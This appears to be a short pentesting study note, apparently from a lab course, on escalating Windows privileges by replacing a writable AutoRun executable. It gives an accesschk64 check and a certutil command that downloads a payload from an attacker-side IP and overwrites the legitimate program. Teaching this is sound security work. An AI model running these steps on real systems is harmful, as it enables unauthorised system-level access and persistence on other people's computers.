AutoRuns

Overview

AutoRun is a feature that will automatically runs a program or application when a drive is mounted. This can be exploited by changing the executable of an existing Autorun program. When the computer restarts and an Administrator logs in it will run the malicious executable as system.

Escalation via AutoRun

Check for AutoRuns in the registry using PowerUp

TCM Windows Priv Esc on THM

Check for write access to the file. Should return with FILE_ALL_ACCESS under RW Everyone

accesschk64.exe -wvu "C:\Program Files\AutorunProgram.exe"

Replace AutoRun executable

certutil.exe -urlcache -f http://10.10.14.1/program.exe "C:\Program Files\Autorun Program\program.exe"
PreviousRegistyNextAlwaysInstallElevated